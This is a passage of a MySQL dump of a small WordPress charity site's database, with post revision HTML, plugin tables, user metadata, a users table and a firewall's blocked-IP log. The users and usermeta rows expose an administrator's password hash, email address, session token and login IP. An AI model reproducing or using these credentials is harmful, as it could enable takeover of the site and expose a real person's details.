type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>','Financial Planning for Divorcees','Financial planning associated with divorce is not going to get any easier, it’s one of those areas where you need to take action sooner rather than later.','inherit','closed','closed','','65-revision-v1','','','2018-12-19 10:03:41','2018-12-19 10:03:41','',65,'http://www.equalitywalk.org.uk/65-revision-v1',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_rcsm_subscribers`
--

DROP TABLE IF EXISTS `wp_rcsm_subscribers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_rcsm_subscribers` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `f_name` varchar(255) NOT NULL,
  `l_name` varchar(255) NOT NULL,
  `email` varchar(255) NOT NULL,
  `date` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `act_code` varchar(255) NOT NULL,
  `extra_detail` text DEFAULT NULL,
  `flag` int(11) DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_rcsm_subscribers`
--

LOCK TABLES `wp_rcsm_subscribers` WRITE;
/*!40000 ALTER TABLE `wp_rcsm_subscribers` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_rcsm_subscribers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_redirection_404`
--

DROP TABLE IF EXISTS `wp_redirection_404`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_404` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `created` datetime NOT NULL,
  `url` mediumtext NOT NULL,
  `domain` varchar(255) DEFAULT NULL,
  `agent` varchar(255) DEFAULT NULL,
  `referrer` varchar(255) DEFAULT NULL,
  `http_code` int(11) unsigned NOT NULL DEFAULT 0,
  `request_method` varchar(10) DEFAULT NULL,
  `request_data` mediumtext DEFAULT NULL,
  `ip` varchar(45) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `created` (`created`),
  KEY `referrer` (`referrer`(191)),
  KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_redirection_404`
--

LOCK TABLES `wp_redirection_404` WRITE;
/*!40000 ALTER TABLE `wp_redirection_404` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_redirection_404` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_redirection_groups`
--

DROP TABLE IF EXISTS `wp_redirection_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_groups` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `tracking` int(11) NOT NULL DEFAULT 1,
  `module_id` int(11) unsigned NOT NULL DEFAULT 0,
  `status` enum('enabled','disabled') NOT NULL DEFAULT 'enabled',
  `position` int(11) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `module_id` (`module_id`),
  KEY `status` (`status`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_redirection_groups`
--

LOCK TABLES `wp_redirection_groups` WRITE;
/*!40000 ALTER TABLE `wp_redirection_groups` DISABLE KEYS */;
INSERT INTO `wp_redirection_groups` VALUES (1,'Redirections',1,1,'enabled',0),(2,'Modified Posts',1,1,'enabled',1);
/*!40000 ALTER TABLE `wp_redirection_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_redirection_items`
--

DROP TABLE IF EXISTS `wp_redirection_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_items` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `url` mediumtext NOT NULL,
  `match_url` varchar(2000) DEFAULT NULL,
  `match_data` text DEFAULT NULL,
  `regex` int(11) unsigned NOT NULL DEFAULT 0,
  `position` int(11) unsigned NOT NULL DEFAULT 0,
  `last_count` int(10) unsigned NOT NULL DEFAULT 0,
  `last_access` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `group_id` int(11) NOT NULL DEFAULT 0,
  `status` enum('enabled','disabled') NOT NULL DEFAULT 'enabled',
  `action_type` varchar(20) NOT NULL,
  `action_code` int(11) unsigned NOT NULL,
  `action_data` mediumtext DEFAULT NULL,
  `match_type` varchar(20) NOT NULL,
  `title` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `url` (`url`(191)),
  KEY `status` (`status`),
  KEY `regex` (`regex`),
  KEY `group_idpos` (`group_id`,`position`),
  KEY `group` (`group_id`),
  KEY `match_url` (`match_url`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_redirection_items`
--

LOCK TABLES `wp_redirection_items` WRITE;
/*!40000 ALTER TABLE `wp_redirection_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_redirection_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_redirection_logs`
--

DROP TABLE IF EXISTS `wp_redirection_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_logs` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `created` datetime NOT NULL,
  `url` mediumtext NOT NULL,
  `domain` varchar(255) DEFAULT NULL,
  `sent_to` mediumtext DEFAULT NULL,
  `agent` mediumtext DEFAULT NULL,
  `referrer` mediumtext DEFAULT NULL,
  `http_code` int(11) unsigned NOT NULL DEFAULT 0,
  `request_method` varchar(10) DEFAULT NULL,
  `request_data` mediumtext DEFAULT NULL,
  `redirect_by` varchar(50) DEFAULT NULL,
  `redirection_id` int(11) unsigned DEFAULT NULL,
  `ip` varchar(45) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `created` (`created`),
  KEY `redirection_id` (`redirection_id`),
  KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_redirection_logs`
--

LOCK TABLES `wp_redirection_logs` WRITE;
/*!40000 ALTER TABLE `wp_redirection_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_redirection_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (42,1,0),(47,1,0),(59,1,0),(84,1,0),(185,2,0),(187,2,0),(188,2,0),(189,2,0),(298,2,0),(299,2,0),(300,2,0),(308,2,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,4),(2,2,'nav_menu','',0,8);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'top','top',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_tsw_log`
--

DROP TABLE IF EXISTS `wp_tsw_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_tsw_log` (
  `IP` varchar(17) NOT NULL,
  `Time` int(11) NOT NULL,
  `IS_BOT` tinyint(1) NOT NULL,
  `IS_HIT` tinyint(1) NOT NULL,
  PRIMARY KEY (`IP`,`Time`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_tsw_log`
--

LOCK TABLES `wp_tsw_log` WRITE;
/*!40000 ALTER TABLE `wp_tsw_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_tsw_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=33 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','equalitywalk'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'locale',''),(11,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(12,1,'wp_user_level','10'),(13,1,'dismissed_wp_pointers',''),(14,1,'show_welcome_panel','1'),(15,1,'session_tokens','a:1:{s:64:\"b235c7e80a18dea2271efbb8e8a7a853a1c26cd4f058e71f8d16b55c6db63b56\";a:4:{s:10:\"expiration\";i:1649846819;s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36\";s:5:\"login\";i:1649674019;}}'),(16,1,'wp_dashboard_quick_press_last_post_id','368'),(17,1,'wp_yoast_notifications','a:4:{i:0;a:2:{s:7:\"message\";s:321:\"The configuration wizard helps you to easily configure your site to have the optimal SEO settings.<br/>We have detected that you have not finished this wizard yet, so we recommend you to <a href=\"https://www.equalitywalk.org.uk/wp-admin/?page=wpseo_configurator\">start the configuration wizard to configure Yoast SEO</a>.\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:31:\"wpseo-dismiss-onboarding-notice\";s:5:\"nonce\";N;s:8:\"priority\";d:0.8;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:14:\"manage_options\";s:16:\"capability_check\";s:3:\"all\";}}i:1;a:2:{s:7:\"message\";s:780:\"We\'ve noticed you\'ve been using Yoast SEO for some time now; we hope you love it! We\'d be thrilled if you could <a href=\"https://yoa.st/rate-yoast-seo?utm_content=4.7\">give us a 5 stars rating on WordPress.org</a>!\n\nIf you are experiencing issues, <a href=\"https://yoa.st/bugreport?utm_content=4.7\">please file a bug report</a> and we\'ll do our best to help you out.\n\nBy the way, did you know we also have a <a href=\'https://yoa.st/premium-notification?utm_content=4.7\'>Premium plugin</a>? It offers advanced features, like a redirect manager and support for multiple keywords. It also comes with 24/7 personal support.\n\n<a class=\"button\" href=\"https://www.equalitywalk.org.uk/wp-admin/?page=wpseo_dashboard&yoast_dismiss=upsell\">Please don\'t show me this notification anymore</a>\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:19:\"wpseo-upsell-notice\";s:5:\"nonce\";N;s:8:\"priority\";d:0.8;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:14:\"manage_options\";s:16:\"capability_check\";s:3:\"all\";}}i:2;a:2:{s:7:\"message\";s:617:\"<p>The <em>Google XML Sitemaps</em> plugin might cause issues when used in conjunction with Yoast SEO.</p><p>Both Yoast SEO and Google XML Sitemaps can create XML sitemaps. Having two XML sitemaps is not beneficial for search engines, yet might slow down your site.<br/><br/><a class=\"button\" href=\"https://www.equalitywalk.org.uk/wp-admin/admin.php?page=wpseo_xml\">Configure Yoast SEO\'s XML Sitemap settings</a></p><a class=\"button button-primary\" href=\"plugins.php?action=deactivate&amp;plugin=google-sitemap-generator%2Fsitemap.php&amp;plugin_status=all&amp;_wpnonce=a18ae0e47d\">Deactivate Google XML Sitemaps</a> \";s:7:\"options\";a:8:{s:4:\"type\";s:5:\"error\";s:2:\"id\";s:47:\"wpseo-conflict-d3e7311d20ccd459ef1ade2a522ccfe6\";s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";a:1:{i:0;s:14:\"manage_options\";}s:16:\"capability_check\";s:3:\"all\";}}i:3;a:2:{s:7:\"message\";s:174:\"Don\'t miss your crawl errors: <a href=\"https://www.equalitywalk.org.uk/wp-admin/admin.php?page=wpseo_search_console&tab=settings\">connect with Google Search Console here</a>.\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:17:\"wpseo-dismiss-gsc\";s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:14:\"manage_options\";s:16:\"capability_check\";s:3:\"all\";}}}'),(18,1,'_yoast_wpseo_profile_updated','1494324844'),(19,1,'last_login_time','2022-04-11 10:46:59'),(20,1,'wp_user-settings','editor=tinymce&libraryContent=browse&imgsize=large&align=center'),(21,1,'wp_user-settings-time','1507806901'),(22,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(23,1,'metaboxhidden_nav-menus','a:3:{i:0;s:15:\"dw-menu-widgets\";i:1;s:12:\"add-post_tag\";i:2;s:19:\"dw-megamenu-setting\";}'),(24,1,'tgmpa_dismissed_notice','1'),(25,1,'nav_menu_recently_edited','2'),(26,1,'manageedit-pagecolumnshidden','a:4:{i:0;s:4:\"date\";i:1;s:13:\"qfi-thumbnail\";i:2;s:11:\"wpseo-score\";i:3;s:23:\"wpseo-score-readability\";}'),(27,1,'edit_page_per_page','80'),(28,1,'closedpostboxes_page','a:1:{i:0;s:10:\"wpseo_meta\";}'),(29,1,'metaboxhidden_page','a:6:{i:0;s:12:\"revisionsdiv\";i:1;s:10:\"postcustom\";i:2;s:16:\"commentstatusdiv\";i:3;s:11:\"commentsdiv\";i:4;s:7:\"slugdiv\";i:5;s:9:\"authordiv\";}'),(31,1,'wfls-last-login','1629872147'),(32,1,'community-events-location','a:1:{s:2:\"ip\";s:13:\"185.175.113.0\";}');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'sd8s999ddx@@ )_','$P$BlaUpi0Y.r7lF1EDkDOJ7kWi2.MF3q/','equalitywalk','bensykes@bensykes.co.uk','','2017-05-09 10:09:42','',0,'equalitywalk');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfblockediplog`
--

DROP TABLE IF EXISTS `wp_wfblockediplog`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblockediplog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) unsigned NOT NULL DEFAULT 0,
  `unixday` int(10) unsigned NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic',
  PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfblockediplog`
--

LOCK TABLES `wp_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wp_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wp_wfblockediplog` VALUES ('\0\0\0\0\0\0\0\0\0\0��t�','CN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��tK�','CN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n','KR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n','KR',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��;u','TR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��;u','TR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��;u','TR',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��;u7','TR',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��DB�','DE',3,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��m.�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��~�','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����$','US',1,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0���x','RO',3,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��	B�','DE',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��3h','RU',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��=�','NL',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��>8)','BO',2,18835,'brute'),('\0\0\0\0\0\0\0\0\0\0��e�','RU',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��e�8','RU',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�','FR',2,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','FR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','FR',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L','RU',3,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L','RU',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0���>�','RU',2,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���>�','RU',2,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0���>�','RU',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���_','IR',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���=�','RU',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���=�','RU',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���','CN',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0���5�','HK',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ғ�','CN',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ғ�','CN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ғ�','CN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rC1<','SG',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rL��','SG',2,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rL��','SG',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r�Od','AU',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r�>','IN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���~d','US',12,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',4,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��&	�','US',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��fO�','US',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0���?','US',2,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���?','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��^x�','NL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��ca�','HK',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���m�','CN',2,18852,'waf'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���M','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��2M_','AU',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��2M_','AU',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��2M_','AU',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��:�(','IN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��pNH','ID',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��A','IR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����